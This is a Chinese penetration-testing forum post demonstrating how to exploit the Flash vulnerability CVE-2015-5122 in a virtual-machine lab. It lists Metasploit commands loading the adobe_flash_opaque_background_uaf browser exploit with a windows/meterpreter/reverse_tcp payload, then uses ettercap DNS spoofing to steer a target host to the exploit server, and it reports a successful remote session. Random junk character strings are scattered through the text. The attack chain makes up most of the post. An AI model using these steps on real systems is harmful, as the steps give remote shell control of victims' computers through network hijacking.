中国网络渗透测试联盟

标题: cve2015-5122漏洞实例演示虚拟机 [打印本页]

作者: admin 时间: 2018-10-20 20:28
标题: cve2015-5122漏洞实例演示虚拟机

' Y8 ^( d* F+ p( } 二、cve2015-5122漏洞实例演示虚拟机 / A0 I5 Y5 ]* p3 b3 V% C) G

& r: t* M6 F8 G 关于cve2015-5122这个漏洞，大家可以百度一下，是关于flash的漏洞，是2015年flash漏洞的第二发，今天我们就用这个漏洞来演示，开启kai linux msfconsole命令启动msf如图： ) {# }2 y5 c" e) a

) s. j9 `7 f3 Y" R/ j search cve-2015-5122如图： & G3 ^; Y/ X. R: z- R) P

( u+ S% F. ^2 m& b ' [" P; k2 E4 T8 C0 y3 C

" ^0 I7 ^3 W" R, A& q! E 下面我们敲如下命令： ) L, }6 I; Q4 Z7 g; h

# |5 t( M P3 s$ G& P use exploit/multi/browser/adobe_flash_opaque_background_uaf $ V$ q( U6 u6 F

+ f" B" T# Q/ P, L+ \; Z7 A set PAYLOAD windows/meterpreter/reverse_tcp * ^# X2 Z- [( C

, |4 q" j% l" ?) T set LHOST 192.168.0.109 * w2 `5 P5 _$ w" @) Q/ Y

1 y* k/ f* c" P, A set URIPATH / /*根目录*/ 2 x( k7 \5 ]8 U0 ]8 o6 I( a

$ `, E% k4 `6 ^ set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 ; e9 c) Z$ A# C! u5 g6 E3 `- s/ g1 | P- L

- P) `' P% S: F+ t( V1 d, ? set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 3 j n0 b. j4 s ?& I4 I/ ]0 D/ g

8 t* [ K% k% J9 A" K( H5 ?4 g 然后show options如图： }5 p4 a: g- p8 |# \5 Z$ T" W

7 U$ H7 ?; F- v. k" I$ ^0 D9 H 5 n# i, l! q# N" M& A& f

8 @7 z9 \; r% Y8 U 一切都设置好了，执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图：
! n( s7 [. g7 F. F % l, e$ J5 v( R: O

9 N8 `( o# U, V' D; M9 } 然后ettercap -G命令打开ettercap，我们要攻击的主机ip是192.168.0。115 3 I4 c" T, K1 @

|' x8 m1 E; m$ b0 ^ Ettercap过程第一篇里已经演示，这里不在详细写了。。。执行完ettercap以后我们观察一下msf , p* ~8 j- K, U8 z$ _

/ t7 k$ G7 [$ G0 X6 \ & Y" ]" B6 _/ r" I1 h0 J: X

1 k- F" t" d* _* C' i 成功了，这时候我们断开ettercap，如图： E: q3 S9 R( |0 j9 a n& n# X3 z

, W# `, @/ `& b3 S' u9 C " J- Q4 A8 R" U0 l& {4 I

8 |2 e' g0 Q' a @6 k4 v0 E1 m) ` Screenshot如图： ' h6 l- J! I d D* o5 H* `

, |# N2 Y2 A. M( P! a8 ^) d " W `7 L: Q' G4 o

' F8 ?" v: m- n( ~ * |: A. q( n8 L! ]; c. @8 ~

欢迎光临中国网络渗透测试联盟 (https://cobjon.com/)